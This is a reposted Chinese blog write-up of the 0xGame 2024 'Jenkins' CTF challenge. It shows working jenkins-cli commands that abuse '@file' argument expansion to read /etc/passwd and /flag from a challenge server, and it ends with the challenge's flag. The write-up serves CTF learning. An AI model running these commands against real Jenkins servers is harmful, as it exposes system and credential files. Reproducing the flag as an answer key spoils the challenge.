自学内容网 自学内容网

0xGame 2024 [Week 4] Jenkins

1.前言

由于好久没做web题了,所以今天来尝试来做一波web题,仅供刷题记录。

2.题目

这个给的提示对于小白来说实在是友好的过劲。

3.分析

上网搜到一个关于Jenkins的历史漏洞,下面链接可供参考

https://blog.csdn.net/2301_80127209/article/details/139777834icon-default.png?t=O83Ahttps://blog.csdn.net/2301_80127209/article/details/139777834

打开页面


利用框架漏洞  ,路径后进行添加   /jnlpJars/jenkins-cli.jar,下载下来文件



进行读取文件   ,这里我把下载下来的文件放在了z盘,大家要根据其文件实际位置进行操作

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http who-am-i "@/etc/passwd"

成功实现任意文件读取功能 ,但只是显示了一部分

尝试目标是否开启了“匿名用户可读”选项,开启了话则可以显示全部命令,当然这一步也可省略,但是我们可以测试一波也花不了多长时间

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/etc/passwd"

这时候我们可以尝试读取flag内容了,根据做题经验,猜测flag在根目录下
 

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/flag"

成功获取到flag

4.答案

0xgame{2a6d2b88-7d12-4b66-901d-5ed489e9a322}


原文地址:https://blog.csdn.net/2302_82243198/article/details/143432287

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!